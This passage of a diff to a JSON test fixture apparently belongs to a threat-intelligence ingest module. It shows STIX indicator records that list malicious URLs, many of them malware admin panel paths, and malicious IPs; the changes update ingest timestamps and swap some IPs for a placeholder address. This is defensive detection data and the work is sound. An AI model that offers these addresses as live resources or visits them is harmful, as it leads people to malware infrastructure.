'http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:38.721Z\"}", "category": "threat", "type": "indicator", @@ -10880,7 +10880,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386054965Z", + "ingested": "2021-12-13T08:38:40.023822500Z", "original": "{\"created\":\"2020-01-29T03:00:51.527Z\",\"description\":\"TS ID: 55266539012; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b9eafbc4-77e3-4b9b-bd34-a15681f0bbec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-29T03:00:51.527Z\",\"name\":\"mal_url: http://corpcougar.com/me/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/me/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:51.527Z\"}", "category": "threat", "type": "indicator", @@ -10932,7 +10932,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386060535Z", + "ingested": "2021-12-13T08:38:40.023829900Z", "original": "{\"created\":\"2020-01-29T03:01:05.442Z\",\"description\":\"TS ID: 55266539004; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--9a6acfec-ffa7-47c7-8176-7dbaca7b379f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:01:05.442Z\",\"name\":\"mal_url: http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:05.442Z\"}", "category": "threat", "type": "indicator", @@ -10951,7 +10951,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 78.128.76.165", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime", "modified": "2020-01-29T03:01:13.933Z", "valid_from": "2020-01-29T03:01:13.933Z", @@ -10973,12 +10973,12 @@ "first_seen": "2020-01-29T03:01:13.933Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "78.128.76.165" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386065264Z", - "original": "{\"created\":\"2020-01-29T03:01:13.933Z\",\"description\":\"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime\",\"id\":\"indicator--5384d504-8760-4255-8daa-dd156dc302d0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-29T03:01:13.933Z\",\"name\":\"mal_ip: 78.128.76.165\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '78.128.76.165']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:13.933Z\"}", + "ingested": "2021-12-13T08:38:40.023834600Z", + "original": "{\"created\":\"2020-01-29T03:01:13.933Z\",\"description\":\"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime\",\"id\":\"indicator--5384d504-8760-4255-8daa-dd156dc302d0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-29T03:01:13.933Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:13.933Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11029,7 +11029,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386069983Z", + "ingested": "2021-12-13T08:38:40.023840600Z", "original": "{\"created\":\"2020-01-29T03:01:31.192Z\",\"description\":\"TS ID: 55266539003; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--56b347c9-58c9-48d5-a015-2d561d855af2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:01:31.192Z\",\"name\":\"mal_url: http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:31.192Z\"}", "category": "threat", "type": "indicator", @@ -11081,7 +11081,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386074682Z", + "ingested": "2021-12-13T08:38:40.023846500Z", "original": "{\"created\":\"2020-01-29T03:01:37.815Z\",\"description\":\"TS ID: 55266538992; iType: mal_url; State: active; Org: Exa Bytes Network Sdn.Bhd.; Source: CyberCrime\",\"id\":\"indicator--840739fb-44ae-42f0-805f-422b38422325\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-29T03:01:37.815Z\",\"name\":\"mal_url: http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:37.815Z\"}", "category": "threat", "type": "indicator", @@ -11133,7 +11133,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386078940Z", + "ingested": "2021-12-13T08:38:40.023852100Z", "original": "{\"created\":\"2020-01-29T03:01:49.96Z\",\"description\":\"TS ID: 55266539011; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--9ab8a69c-5b95-4fd6-b189-11d90ee54834\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-29T03:01:49.96Z\",\"name\":\"mal_url: http://rgmechanics.fun/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rgmechanics.fun/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:49.96Z\"}", "category": "threat", "type": "indicator", @@ -11185,7 +11185,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386083238Z", + "ingested": "2021-12-13T08:38:40.023855900Z", "original": "{\"created\":\"2020-01-29T03:02:14.284Z\",\"description\":\"TS ID: 55266539013; iType: mal_url; State: active; Org: Lir.bg EOOD; Source: CyberCrime\",\"id\":\"indicator--96051c6b-3648-43ba-b579-735bd6342ec2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-29T03:02:14.284Z\",\"name\":\"mal_url: http://sbsinstitute.co.in/wp-includes/temp/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sbsinstitute.co.in/wp-includes/temp/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:14.284Z\"}", "category": "threat", "type": "indicator", @@ -11237,7 +11237,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386087696Z", + "ingested": "2021-12-13T08:38:40.023859700Z", "original": "{\"created\":\"2020-01-29T03:02:24.081Z\",\"description\":\"TS ID: 55266539001; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d76d300b-07b7-4e9b-b7f1-9e6c0def6a6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:24.081Z\",\"name\":\"mal_url: http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:24.081Z\"}", "category": "threat", "type": "indicator", @@ -11289,7 +11289,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386091954Z", + "ingested": "2021-12-13T08:38:40.023863700Z", "original": "{\"created\":\"2020-01-29T03:02:31.573Z\",\"description\":\"TS ID: 55266539009; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--3c61c714-aab6-46e2-abfd-389628870d7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-29T03:02:31.573Z\",\"name\":\"mal_url: http://v200598.hosted-by-vdsina.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://v200598.hosted-by-vdsina.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:31.573Z\"}", "category": "threat", "type": "indicator", @@ -11341,7 +11341,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386096402Z", + "ingested": "2021-12-13T08:38:40.023869Z", "original": "{\"created\":\"2020-01-29T03:02:31.605Z\",\"description\":\"TS ID: 55266539007; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--3c9a39df-b4f3-4529-bfd8-d8b40801e555\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:31.605Z\",\"name\":\"mal_url: http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:31.605Z\"}", "category": "threat", "type": "indicator", @@ -11360,7 +11360,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 217.29.57.178", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime", "modified": "2020-01-29T03:02:41.021Z", "valid_from": "2020-01-29T03:02:41.021Z", @@ -11382,12 +11382,12 @@ "first_seen": "2020-01-29T03:02:41.021Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "217.29.57.178" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386101522Z", - "original": "{\"created\":\"2020-01-29T03:02:41.021Z\",\"description\":\"TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime\",\"id\":\"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-29T03:02:41.021Z\",\"name\":\"mal_ip: 217.29.57.178\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '217.29.57.178']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:41.021Z\"}", + "ingested": "2021-12-13T08:38:40.023873500Z", + "original": "{\"created\":\"2020-01-29T03:02:41.021Z\",\"description\":\"TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime\",\"id\":\"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-29T03:02:41.021Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:41.021Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11438,7 +11438,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386105840Z", + "ingested": "2021-12-13T08:38:40.023878Z", "original": "{\"created\":\"2020-01-29T03:02:42.284Z\",\"description\":\"TS ID: 55266539010; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--e34dc439-4789-4d5a-b7dc-471fb473f4a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-29T03:02:42.284Z\",\"name\":\"mal_url: http://v178903.hosted-by-vdsina.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://v178903.hosted-by-vdsina.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.284Z\"}", "category": "threat", "type": "indicator", @@ -11490,7 +11490,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386110789Z", + "ingested": "2021-12-13T08:38:40.023881600Z", "original": "{\"created\":\"2020-01-29T03:02:42.335Z\",\"description\":\"TS ID: 55266538994; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--a30fe926-53b8-43fe-a792-8ecd41071dd7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-29T03:02:42.335Z\",\"name\":\"mal_url: http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.335Z\"}", "category": "threat", "type": "indicator", @@ -11542,7 +11542,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386115648Z", + "ingested": "2021-12-13T08:38:40.023886900Z", "original": "{\"created\":\"2020-01-29T03:02:42.367Z\",\"description\":\"TS ID: 55266538986; iType: mal_url; State: active; Org: Eonix Corporation; Source: CyberCrime\",\"id\":\"indicator--0005f77c-327b-4b69-8046-777efe95361d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-29T03:02:42.367Z\",\"name\":\"mal_url: http://microsoftrenat.site/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://microsoftrenat.site/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.367Z\"}", "category": "threat", "type": "indicator", @@ -11594,7 +11594,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386120067Z", + "ingested": "2021-12-13T08:38:40.023894300Z", "original": "{\"created\":\"2020-01-29T03:02:48.869Z\",\"description\":\"TS ID: 55266539005; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--2ef4b932-5434-49f4-8255-a70de96893d8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:48.869Z\",\"name\":\"mal_url: http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:48.869Z\"}", "category": "threat", "type": "indicator", @@ -11613,7 +11613,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 31.31.196.78", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime", "modified": "2020-01-29T03:02:48.897Z", "valid_from": "2020-01-29T03:02:48.897Z", @@ -11635,12 +11635,12 @@ "first_seen": "2020-01-29T03:02:48.897Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "31.31.196.78" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386124685Z", - "original": "{\"created\":\"2020-01-29T03:02:48.897Z\",\"description\":\"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-29T03:02:48.897Z\",\"name\":\"mal_ip: 31.31.196.78\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '31.31.196.78']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:48.897Z\"}", + "ingested": "2021-12-13T08:38:40.023901700Z", + "original": "{\"created\":\"2020-01-29T03:02:48.897Z\",\"description\":\"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-29T03:02:48.897Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:48.897Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11690,7 +11690,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386129434Z", + "ingested": "2021-12-13T08:38:40.023906400Z", "original": "{\"created\":\"2020-01-30T02:58:32.284Z\",\"description\":\"TS ID: 55270319168; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--8da10219-9eb1-4963-8889-587598e511cd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-30T02:58:32.284Z\",\"name\":\"mal_url: http://www.cpadeer.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://www.cpadeer.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-30T02:58:32.284Z\"}", "category": "threat", "type": "indicator", @@ -11742,7 +11742,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386134083Z", + "ingested": "2021-12-13T08:38:40.023910600Z", "original": "{\"created\":\"2020-01-31T02:19:29.045Z\",\"description\":\"TS ID: 55274447486; iType: mal_url; State: active; Org: SingleHop LLC; Source: CyberCrime\",\"id\":\"indicator--093bf827-0d84-4b54-9d62-dffffd0a619b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-31T02:19:29.045Z\",\"name\":\"mal_url: http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-31T02:19:29.045Z\"}", "category": "threat", "type": "indicator", @@ -11794,7 +11794,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386138672Z", + "ingested": "2021-12-13T08:38:40.023915800Z", "original": "{\"created\":\"2020-01-31T02:22:09.726Z\",\"description\":\"TS ID: 55274447484; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--51d4eb13-adf7-4de1-a3f0-106d343ad560\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-31T02:22:09.726Z\",\"name\":\"mal_url: http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-31T02:22:09.726Z\"}", "category": "threat", "type": "indicator", @@ -11846,7 +11846,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386143631Z", + "ingested": "2021-12-13T08:38:40.023919900Z", "original": "{\"created\":\"2020-02-01T02:03:02.79Z\",\"description\":\"TS ID: 55277443309; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--a5926161-953c-4763-9d10-0c5e10bcd4e4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:03:02.79Z\",\"name\":\"mal_url: http://marubemi.com/owen/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://marubemi.com/owen/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:02.79Z\"}", "category": "threat", "type": "indicator", @@ -11865,7 +11865,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 62.76.41.133", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime", "modified": "2020-02-01T02:03:07.047Z", "valid_from": "2020-02-01T02:03:07.047Z", @@ -11887,12 +11887,12 @@ "first_seen": "2020-02-01T02:03:07.047Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "62.76.41.133" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386148019Z", - "original": "{\"created\":\"2020-02-01T02:03:07.047Z\",\"description\":\"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-28\"],\"modified\":\"2020-02-01T02:03:07.047Z\",\"name\":\"mal_ip: 62.76.41.133\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '62.76.41.133']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:07.047Z\"}", + "ingested": "2021-12-13T08:38:40.023926200Z", + "original": "{\"created\":\"2020-02-01T02:03:07.047Z\",\"description\":\"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-28\"],\"modified\":\"2020-02-01T02:03:07.047Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:07.047Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11943,7 +11943,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386152518Z", + "ingested": "2021-12-13T08:38:40.023930100Z", "original": "{\"created\":\"2020-02-01T02:03:48.038Z\",\"description\":\"TS ID: 55277443373; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--8494f340-0964-47f0-ba09-78fe0b76eb34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:03:48.038Z\",\"name\":\"mal_url: http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:48.038Z\"}", "category": "threat", "type": "indicator", @@ -11995,7 +11995,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386159300Z", + "ingested": "2021-12-13T08:38:40.023935500Z", "original": "{\"created\":\"2020-02-01T02:03:48.079Z\",\"description\":\"TS ID: 55277443242; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f051e10a-76c9-4f14-9fa3-9dbccc65c26f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:03:48.079Z\",\"name\":\"mal_url: http://farzanatradings.com/maindon/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/maindon/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:48.079Z\"}", "category": "threat", "type": "indicator", @@ -12047,7 +12047,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386164280Z", + "ingested": "2021-12-13T08:38:40.023939400Z", "original": "{\"created\":\"2020-02-01T02:04:16.392Z\",\"description\":\"TS ID: 55277443446; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--79c8f52b-f134-4e02-ad7a-6169063c8fba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:04:16.392Z\",\"name\":\"mal_url: http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:16.392Z\"}", "category": "threat", "type": "indicator", @@ -12099,7 +12099,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386168999Z", + "ingested": "2021-12-13T08:38:40.023943600Z", "original": "{\"created\":\"2020-02-01T02:04:21.636Z\",\"description\":\"TS ID: 55277443452; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--7338fc3d-2a1f-4583-b34d-eb76912a43e6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-01T02:04:21.636Z\",\"name\":\"mal_url: http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.636Z\"}", "category": "threat", "type": "indicator", @@ -12118,7 +12118,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.23/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-01T02:04:21.676Z", "valid_from": "2020-02-01T02:04:21.676Z", @@ -12142,16 +12142,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.188.60.23/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.188.60.23", - "full": "http://5.188.60.23/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386173357Z", - "original": "{\"created\":\"2020-02-01T02:04:21.676Z\",\"description\":\"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1f9e0571-119c-448a-8656-fec49c9c058a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:04:21.676Z\",\"name\":\"mal_url: http://5.188.60.23/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 